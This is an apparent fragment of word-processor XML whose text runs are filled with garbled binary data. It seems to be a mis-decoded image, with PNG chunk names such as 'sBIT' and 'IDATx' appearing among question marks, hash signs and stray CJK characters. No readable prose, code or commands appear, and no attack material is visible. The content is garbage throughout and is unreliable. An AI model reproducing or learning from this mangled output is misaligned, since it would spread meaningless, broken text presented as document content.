        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>z#?F#`????#?y??c???3?i??A?????_??#e??_?c?#?*z??#?#?/?S??q?#j?????????+??:#y?#?+?:?&lt;???#??e?0??+?9?(?#?(?#?(?#?(?#?(?#?????#?#?^??#G5r??|R?#?????#??#??^?#~??#???#????+??S~#???9?tk??#????c?wa~&amp;vv###?#q?G5???\2??#?#NT???Z?9??????#?^c???_#?!??\?|&lt;????O&gt;as4{?</w:t>
        <w:tab/>
        <w:br/>
        <w:t>?g##</w:t>
        <w:br/>
        <w:t>?2?T0?#</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>槍</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>?#8?n?I#?t???o?#?#u#?=#?#?????#?O#?S?m?1?z}???u?L??k?_E????W????i?&lt;??</w:t>
        <w:tab/>
        <w:t>?~?&gt;-??5??#u?^9#?^?o?^??|4????????=)4?#?gx?G????IgbOA?#W?\???n?</w:t>
        <w:br/>
        <w:t>?,MX??J?vg?J.0Qg??p?xC????#|?_M??&lt;##}o???|?_q??#?C??yU?#??(?@?</w:t>
        <w:br/>
        <w:t>(??</w:t>
        <w:br/>
        <w:t>(??</w:t>
        <w:br/>
        <w:t>(??</w:t>
        <w:br/>
        <w:t>(??</w:t>
        <w:br/>
        <w:t>(??:??_?S|[?#a{??#???Q?K?Jo??/w?#???z`#???8?#??#???#?Du?i_?_##???#????:W?g_?????????f?S???#??#???#??&gt;?8???&gt;#K?R??i&lt;?!o1??rJ??{?#?o</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>囕</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>#?67o?F)[Vw?#Ex-W??#n_?R[??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?&amp;?4#???0q?#?T1k&gt;#?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#v?r.?#????#?u#?J???_=?/F{????]??Z????d?B?@#?8'??|???P????vR??;#)??#?????#?5?-}3?h}?#?#???#?5?5~???#?C??x??#??(?@?(??#(??#(??#(??#(??#?&gt;)?M?o????#?sW/]G?/?)?-?#?????j??W???7|2?p?#?=???J??????(?]??z?#c??#</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>脯</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>?ο?#S?#?3?b_+I1???!H#??W??i&amp;??G??8?i??DV#?#?#??#?Z?O#??#?c??#?Z#</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>#A??6y???y}??W??}N?:???#Q?i??#?R??R??:#???s???#?H#U#q#Y?#???q?#?#E?J??{???#kV?%s??u???#?k,R5??HA?H#?#a??^??)???#???ν?!?u]j?p%?+???!?????#0??##???8?#???6??#??~o#?#?????+??H?#?#o??#D???#_??#??W?#</w:t>
        <w:br/>
        <w:t>(??##??(#??(#??(#??(#??(#????#%7??#??#??\?u##????????9???#_??#A_??##??-???J????#??&lt;τ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?#~R?s:?#}N?/??u?4?[?72?&gt;r?o?#?##i????#V?}?~????#????T??K?????@?7#%X#?/?M:?B?n??[##?|?i$w?g?"@d?#=j???m????\E#k??p?~&amp;??V?#?#"???&amp;q??#?q?Y?#?,??2#?????=#$??n?#?=???#?D??#?!]??#r8?`???h??+iT`::#???q]Z???#?Yw?&gt;?W</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>?j??3H???v#????-g?4???O?0?#??a?#?5?#}??l}?##?/??5?#~???#?C??x??#??(?@?(??#(??#(??#(??#(??#?&gt;)?M?o????#?sW/]G?/?)?-?#?????j??W?/??#K??Q???Y???%~MW??#???##`?eN?b?#??#|?r?N</w:t>
        <w:tab/>
        <w:t>w;p?6j_?YH?*HW??</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>dMs~??9&lt;m=?}G??,?u#???F?#??Y??4??H#??6</w:t>
        <w:tab/>
        <w:t>?#?n?D?v{D|?r??L??Lg?????F#K??I??r#?}c}??#0E????w?#</w:t>
        <w:br/>
        <w:t>l???#L3?#?C?8?</w:t>
        <w:br/>
        <w:t>h?????+?$?(W$t??j?0Oqs????j??0???</w:t>
        <w:br/>
        <w:t>?%??0?\?FOS???rg???:?????,?&lt;????M?CD?&gt;/??O?| =??#?5?#}??m??##?n??#|?_y??#????y5???(?@?(??#(??#(??#(??#(??#?&gt;)?M?o????#?sW/]G?/?)?-?#?????j??W?_?z?w??#?HP?~???#?#?~JW?G?Y???7???2h?L#??LW?g.?????6??Xx?Z??YD#?m###}k?m~?[???NK#??|Q?=?</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>嶠</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>??Wvk:???'??do;c??????|T????????y?K?(Qy'/??r? ?N??+?[?r??|???#D;[?s???=F?%??#?f???r}??/u?]AZFk????CY??#h#??c"?y#?#?0?o?</w:t>
        <w:tab/>
        <w:t>kWR????a#?N@?I???????3K?e+%?z??U#??#?#?X?#????#_H??u?#}5?k?#?????#&lt;??u?-~???#v?????#?#Q^??QE##QE##QE##QE##QE##?|R?#?????#??#??^???_?S|[?#a{??#???#???.??#?#???????-???????M?6&lt;??K&lt;#?wJ????Q?;??#&gt;??#???U???6??#?p?`?@?}?E~&amp;|???i?x???k?]Im|;j##Y?#? ?#?#?#???R]?G?#?q?#?(??=G?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>e?####??4?I?n+?}T?&lt;?#?{</w:t>
        <w:br/>
        <w:t>??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9???c?;-K??(U?4?##?`y?$?~?????R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8?##A?#j?h?bw?A?}k???|@?#?J???+XJ?-c???U?j^##?\?I_3??????|/?#\g?#В?l???#?????5?0??+??(??#(??#(??#(??#(??#?&gt;)?M?o????#?sW/]G?/?)?-?#?????j??W?#?#?#?C?3?#P[/?'J????o?#o??#?:?v_?N?????wa&gt;&amp;z#??????I?H?1???QVl?8????WV?7.?##Rq?#?X</w:t>
        <w:tab/>
        <w:t>#?#?[???4??#iV??V[??A?##???*nsIu=[?6C?xSP??</w:t>
        <w:br/>
        <w:t>i???4d?#?)??#??s???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z#?;Z?6??uE*?'R</w:t>
        <w:br/>
        <w:t>0#?C????Ciu?\?9?#??2?#A?N:??#?###GQ???#?#Hч?!##?%A;??T?g?}?5?Ff#T???k|???'&lt;?@r??#?&gt;$?#?x?u???3???|??@???s#?#&lt;C?j</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>&lt;1?t?6#??wLg#?0?gJM?TtN?$?&gt;B??#v??s???#?$????#?/??o???\?]??#?H???-???#???OI?#?v[???k???&lt;6?N??G2???_????a?#??z?-Zr??H???#???#~?##?YK?ū?s#??D#O%Q?2k??/?;?σ?#?#??&lt;'1?5???O??P[&gt;???m???vJ?6~Rh##?|U;A????2?????a?(5?&gt;#??&gt;,x?a?&lt;/&amp;?o!?]Rx?{?l?`?#?k???]?M?#?`?0#p?:????S#?H?c'#?o8?#qO9o?k#?#??&gt;?X25/#hV??-|????/??&gt; ???K?A?[??J?%??y#?(?B???k{?</w:t>
        <w:tab/>
        <w:t>???o?##N2?.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?S????oz?#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?r&lt;?#{?}?W??[?##j~#??5X?.c#??m??2??:?#?pA#?_h|SM???iz??g??????#??/8)*??#N???5?#&amp;??#?X?^?}NI??J(??L??(?#?????#?#?^??#G5r??|R?#?????#??#??^?#~??,a?#</w:t>
        <w:br/>
        <w:t>g???#??#?t?ˊ?D?Z1?g???v_?N?????w?&gt;&amp;v?#?7#&lt;eF@/??u~#???:????^`??9N?dd#|#Y~#@?###;?~???K"c#Fk???Z??zn?Y???##?&gt;K?:D???^P###???????}#?Ci????/#/#)???k?????.L?Ws????#P????????##?#Ey?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>f3?/?#??k???????9$??w_#fW3i????#+???#λ?5#!16??#??h?????????#K?M#?y?(??W#s?F#5??m?!?????j??C?#?5G?ч,??V????V#I???e?!??l|#}#b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?L?G?)?#?0#?#?/???^?F?a??W?n?4?{?V????ct;??J?;?9???#|@?I5?##?z??v?#?#?u\#???p?d??T???nG?~?x????M?M#??X/??????I?/R&gt;???#??#/4&gt;#????????H??u#?#?I9??b?UB?#??????????????e?kM*#?'?#?O????m[?#?u?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>s?[?G???#?b??+?#???#?2s??o??GT9????=s&lt;??#??=???Q])[b</w:t>
        <w:tab/>
        <w:t>c??#e?WEa?</w:t>
        <w:br/>
        <w:t>?d{?TQ@??(?#?(?#?????#?#?^??#G5r??|R?#?????#??#??^?#~??0q#?#;????e??#?t??????????#??#?o?@ ?O?m???Nv???!0pA#q?x#?9?#N-??S?#%#;???;?#m#????P?,$i?#?l#??#?F_?? #??#?##^#?#???6??U?#?K??7Uf??~#?O#??#?I?#???E???}??}???}?K?o??4%#????#?RO?Q6??'???#?+?????#7O#)?????##P#?#???#???#o?"???#????????}</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>翿</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>???,?#????5????#??H??$??#l????$?#???|8?#??1?#^??#????w??#?r?Z??&gt;?_?#???a???_???&amp;~#Q?Oc?#?#?i?d???"??##?O?]???#k#&amp;Y#n????#`#B+???Q?0????#?N?h(???1</w:t>
        <w:br/>
        <w:t>(??</w:t>
        <w:br/>
        <w:t>(??</w:t>
        <w:br/>
        <w:t>(??</w:t>
        <w:br/>
        <w:t>(??</w:t>
        <w:br/>
        <w:t>(??:??_?S|[?#a{??#????M?e?</w:t>
        <w:tab/>
        <w:t>?$x?X?+?I#?L??|?036#;y#?-??</w:t>
        <w:br/>
        <w:t>Z??#??#?i???]G?*?#?#Х??o?&amp;??U?3?#?K\?#?t??M#r?WQ?#</w:t>
        <w:br/>
        <w:t>???)k??.??#???#o??#?R???]7?##@#?#?-??</w:t>
        <w:br/>
        <w:t>Z??#??#?h?#?[???#???#M?#??#/Eu#?|g?#B???#??????V????-s?##??4#??]G?*?#?#Х??o?&amp;??U?3?#?K\?#?t??M#r?WQ?#</w:t>
        <w:br/>
        <w:t>???)k??.??#???#o??#?R???]7?##@#?#?-??</w:t>
        <w:br/>
        <w:t>Z??#??#?h?#?[???#???#M?#??#/Eu#?|g?#B???#??????V????-s?##??4#??]G?*?#?#Х??o?&amp;??U?3?#?K\?#?t??M#r?WQ?#</w:t>
        <w:br/>
        <w:t>???)k??.??#???#o??#?R???]7?##@#?#?-??</w:t>
        <w:br/>
        <w:t>Z??#??#?h?#??#n#?P?##??#?#?6&amp;##:W=?#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?###G#####</w:t>
        <w:br/>
        <w:t>??2####sBIT###3#??####sRGB#??#?##??IDATx^??]???u##&amp;?Y??f#;SD??"K?"</w:t>
        <w:tab/>
        <w:t>?#?i#r?n????????#a)?#3?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>y?b?#f#??#??##?&lt;l#??#c#??#l???J##?ZFI#??</w:t>
        <w:tab/>
        <w:t>Z?#??2Q?n?t%?Ix??u??#??@R1???????8???9??s??u?}?#</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>#???`??v:#?&amp;?#?#'rk?&gt;??JDD?t???t:??x??cR??????g??lzb.?I???I????#?#D?"#?#XOS???#,?]??!^d#?#?)Rq?,?#????#??W##??#V?'\????#??D?+r??=)#?.q?#N)cOQ!?#?S0???(0`??h???;#</w:t>
        <w:tab/>
        <w:t>}E?2(??Cc?~???????##?{j?|#??! ?Le??.?#?6#???##???9Sv90????6?F???S?A??A??5??_ā???m%@????#?-?u?#????d|#???a?)(Vo???U?#???#!Y?Ehq?{?#???y?B=u????Y????-?9?Fg??]]?q-:g???#???ZF?c?6#???*?W#??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M#?#bp#?x??w?z#???t</w:t>
        <w:tab/>
        <w:t>4_??t?</w:t>
        <w:tab/>
        <w:t>&gt;?/?{??sY?@##?z????jr5J#/#?ū#?=(??I???CP?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>?L]#C#??%r#N??R+?#?O#?#?????????????#r??_L?.?;##*&amp;T??t+???C??##?D???#]o??R?f??&amp;H?##????w????#????#i?#?JSiW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W?^???x?H{#W?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>?I]m?gA?s???A?????U#?#^?????#/??_?/?u3a</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>#}???,?[ e?M#?r4;</w:t>
        <w:br/>
        <w:t>g?</w:t>
        <w:br/>
        <w:t>??)##r?r[m??#????&gt;??&lt;????#xZj?;?+XW?h???,?.jul]?z</w:t>
        <w:br/>
        <w:t>??IZ?6??yc???g???m[?</w:t>
        <w:br/>
        <w:t>MX?N??w%???]???&gt;|?p?????Γ??RD??]n#???F%|?a???Γ???^8s</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>?#?fo?#?##??##???3?##2H?y#;?#$??]#@r,I??????&gt;?AgQ??#?/#?</w:t>
        <w:br/>
        <w:t>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0N?_#O#?#????x??p??3X?xnc??F,20?????{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#?#p??#NW_'? ???5?bOu6[?epW?##??x#F??#??#??????o#??????</w:t>
        <w:tab/>
        <w:t>?ke?0??(?7?k#?.??</w:t>
        <w:br/>
        <w:t>??TO???IW????O??\#G]?x??#?%?#??#?</w:t>
        <w:br/>
        <w:t>??{l</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>??'##TC"?A#h?e??????_?##?+T&gt;???E?\*?"??????b1{k6??(*u???d+??A#?=?fvΠ???#?s?^D?.?f?##?\?O??#B#?9#S</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>&lt;??#??z??^?yA?0:k6?Νt??0?#?h9g?YW????????}?;#?9?#?&gt; 7?8#?w?7?@?#???#j&lt;jN?km#0??7h;q??ToO9?#?dq\^C?o?z??&gt;?#7???R?#w?#.?##=H?=2?R??#L2V#?%??R????`?,</w:t>
        <w:br/>
        <w:t>X&lt;?#w?#???</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>{}|?????#???v??@?#f??X???W??????t?#9??U???m???#???K?#??,??#????#???N?|#@??}?????|m??.G7???#FqSc?j?7?z)[!?#?Sh?#??##?,@#N?^Y#r#??B?Vd???tB?C????%?-?#5?#?q?#eo?P?n?D?L??????L+????#\?Y1e?i?^??SJ#5?*#?V?\?P#?#q{????x?????Wnk??]W?O#z?lx?#[?????~??#</w:t>
        <w:br/>
        <w:t>???=$2??D?##???k?0M!1N</w:t>
        <w:tab/>
        <w:t>O-#x??#@?j#?S5?##?J?#?[?{j+?SE??[##???`$????Q?j???7A??N?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5Yk???#?]#J??#5????GjQ?h??j#Vj)*##&lt;##</w:t>
        <w:br/>
        <w:t>??)?#?M?3#??~??/?????!#?&lt;????^?&lt;??????0???#t?{#wi?P?\?^CY?0?6TY#6JS?#?#L#???7?Q?Y-|=?T#???Y????#???W?v#s#?#?[?-?L?9[S&amp;?#??#?#?#???&lt;+L0??i?2?6?o?~?#???#?h@??M1S#`&amp;T?#)#}??M?On????'?#??Z?u?WO</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>z????_???????`#D?#??G?|?J???6?R??KP3?,`V?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>#????W)9UZM}?|#??]???"L??.?bgB#J#3BP ?o???####?oc#???e</w:t>
        <w:tab/>
        <w:t>?IE]?q#?Д?_rg?</w:t>
        <w:br/>
        <w:t>=?2??7?B\?r?K7???a?`LSgESs*?wε??E?h??\???^???7?8##??9??X??*lm?t?*&lt;l??#BB#+UU?V{0T??#?~o?A??vR#8?^f?we#"{Q?]?ie?#???#?P??EJ3?j|??X?A???&amp;?_?s#</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>?1???+h=#R"?r?#????B?k?Z</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>甪</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>??f???DC??\{?@5</w:t>
        <w:br/>
        <w:t>#-R#?;??o??##??rA:#?+??#??`?|?g?#?C???/?#?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S?X??#TE??C+F?JsfP#?5U?#CD?x?&lt; L?##s?</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>锜</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>cJm{k?1[?#???#iJ?J?!?m5BY"?#d-?#?#?r?!O?mK_????X?</w:t>
        <w:br/>
        <w:t>?C??6#?Uop?#?????s????N.?)@_W??#???##/?FX??fV</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>#uDd?#?B?</w:t>
        <w:br/>
        <w:t>#?B?^m?W#%)@???G?#??V??6???_P?????#)5C&lt;BJ?s+??(?#C????P["?%p????(??????;?#????W???#o??N?????+?yx?E##????5??M?</w:t>
        <w:br/>
        <w:t>#O?p?#J??19?#?Y?_&lt;.?#???????y?????#?K?NKH?X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"????&gt;?|y??7??iX^#F??2??H;##o?}?.?$#?:???#)oχ?#F?#p7?E??S?4?E???u??)T)z"t*?j?6?#??od#_???.?T+??7:??#?:}p???=?nx?&lt;k???K?;?C?u#l</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>:??</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>##??}u&amp;?# ?K???k#7?Y?6V????'}]#???.?$MRW??m???;J??#z?????H?ev?????????%h62?????4?????@?bZ#}S??M}?3?v~????[[;?k?</w:t>
        <w:br/>
        <w:t>:#??a??????!?b???</w:t>
        <w:tab/>
        <w:t>??qg?j??#?OW???X??????m?Β"B!?#{??z?#?o??</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>?u?J????#?|????`!??^????/?;;???7~?#?4?z6??z#L?&amp;X?</w:t>
        <w:br/>
        <w:t>?F#L@??###3???%s#L??ui??#??J????3???##???C?+??#??S#??$z?F_M&lt;Z?We??h?[+n?#?+????)s??????????0# ?f???S??)At#v?7??????#??$dM?_??I|j;?@???#?a??N?7??)#AC?D&amp;</w:t>
        <w:tab/>
        <w:t>?#a?QB2???I?#?&lt;?#?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>br#?#)???'??? #?z?2Mi?=?#?'???Ж?T?)Eи(&gt;?</w:t>
        <w:tab/>
        <w:t>?8#Qo4})&amp;-T?SC?q???N`$???f#H"f:+?Oe?#$=}?j??##??3#?#Y"?)?</w:t>
        <w:br/>
        <w:t>#?b?pf??DG??lF#??s,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>??9??o??#m??)?7)##?O?#????W??!s?#Q???#{?#?y##???&lt;9I#K?Y9-q#k?h-?1raZ???3?##9??of???k??&gt;#J`##P(??I?%?I?:???`mUR{W|???I?;E?? ?#?i#O??#?k_??8Qc???????W89??8Q?D?"#???j?F?x????Rd?$+#KA?Y?}QK???#?}?n????P?#j?&amp;??)#S?_?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>?3"??I?x?"?ǖ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1#?,e4?V###?_A???h??????V?|.??ψ&lt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>?P##w????Nk[??p#?X??Ec?#?15#=??h??????d?)@?RBQTa)?Tu?q?????/)p#??W?x???R7?????/###?R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o-??Q??}#1B?e#???e@??3'??75#?????pS?&gt;1?#?.?? SCU|???bET$#??*?Y???Y???2p??u?&amp;?06jqg??i$??@?T????M?j?????;?h???#h?b??@k?K?Yf?i?#?\??e????&amp;?R#+#Oo???*#?????E?(??]??T??#?##?P????I??4?#????B</w:t>
        <w:br/>
        <w:t>UK##o@L6???"?.??#V,??#R*???h{?Z?'J?y?"?X?+I???F??kBU?x???#Q(??#J?Vd??j??b#?P</w:t>
        <w:br/>
        <w:t>???##f!yea??2?Z#?2tbJm?&lt;?R??1BZ%%8??U?`#?#/Nn?[M?"A?Cc{3#??8d??d3#UQ??#?T??j?B#??j#?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>?m?E?k?2)]H?e1Oq???</w:t>
        <w:br/>
        <w:t>et&amp;#?)c#???{vd}##u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?##?"??X???#qS=?#?</w:t>
        <w:br/>
        <w:t>?r]??1?????#??#??</w:t>
        <w:br/>
        <w:t>H??r?"c*?#:???6#??#?f?Vp??#??!?,?R?^?)b#?:OVV?-??*$??"?6#`V?M?j?Y#j?*?#6#M?#?u=????+?*???9?</w:t>
        <w:tab/>
        <w:t>????#?|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e??qM?gi??A?W#i??1#÷h??&gt;\?x/#???X|c#_#???=#]#??#?Z#?#?uP??C?V?|oL??AF?G+Kν2m??:??:?~?</w:t>
        <w:br/>
        <w:t>?#Ay3?z?d?j???_]%??*??1V?#?Kmu?#?#W#gNX?A?#k?#)?CoΙdA=???YM??;??'(?#{??|???_????#lU\?9#?#)-A???]?[????i.</w:t>
        <w:br/>
        <w:t>z#_?l?U}???#?3??YI?e?.?n):#la?###??#?BH</w:t>
        <w:br/>
        <w:t>#S#???#?#??W6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?=?3</w:t>
        <w:br/>
        <w:t>?#?i%U???b?,#???#?c#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???|??#????0w?V???y#b???#@??#?!??? ??f&amp;*##??????N;?????##U</w:t>
        <w:tab/>
        <w:t>??M#???5_??6#L##???-??:?##aQ???#.?J?,??_T?????|??#???"??xz??????????v</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>?%#U??#?,?Z#?z?e#?##?&gt;???</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>??#N?f#??GS?'?5?Z???</w:t>
        <w:br/>
        <w:t>?;i</w:t>
        <w:tab/>
        <w:t>\??eo:#?L???&amp;?+#(#YWY?#OUtY?e?*??_?fY??I5???5?u???@???P?[tU?2A-%#?z##=Fm?#`?v?????t??I??@?Lj???z??#З??ke??`?+.???1'q?#??T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G??c?????w?#?r??/?^???+W0#g0?c???Q????B????W??Z|?5####i?D1#?#?;??p??&amp;ue?P+#t??#Y????_????^??"p?#???2???v?#?K?N??-?d??????i</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>????u#F&lt;??fP??m)l#-$^?#F?##{NEb?"=:B-s?#??3????#[?#N?#??#??,#????e???h2???????/??#g#??E????k????^???8#??+9?V/??Pb????#L?aY???O??t2?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>F2??@?4p????????kk???%?d#???+??0T-? ????{?\@?(?$?#?,#?#?'cJ(&amp;[]?g%w?#?s*I?N?S0&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>泃</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>????5F$</w:t>
        <w:tab/>
        <w:t>?#?J?</w:t>
        <w:br/>
        <w:t>?o???#?B???v8#?J#y~tto??#??&gt;?6?#?~??_}?Zx?w??8 #??K????t?????=l$???Fo}???&lt;?](?d???-Y????a??s?QZ??&amp;t??3??d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o???r??e???G?9d#?A??#(??#?y??y???r/{???y#it)#?#?#?P?6#xj##R-$n?#?w[#?$?R#?[??#2??F,?L??k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  <w:tab/>
        <w:t>iZB'???vM#?b???'?uθ1?Gg#?#w|?i&lt;#?U#???r?{\J?x???4[?Z</w:t>
        <w:br/>
        <w:t>? 8}c???:?##??9?3##SWNc?#Z?5M????#H&lt;l?2'G??[G#?????~????Z|sot?psq?x??#??=#?????@/??u??#?m?c1#t6?B?;???G?|???s?8??a?#?#X)#Se#f????`??#???NJ#j?,?D?????7#v??76x?:?(SD??4?v#]Lc#8X7?/????#??4)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
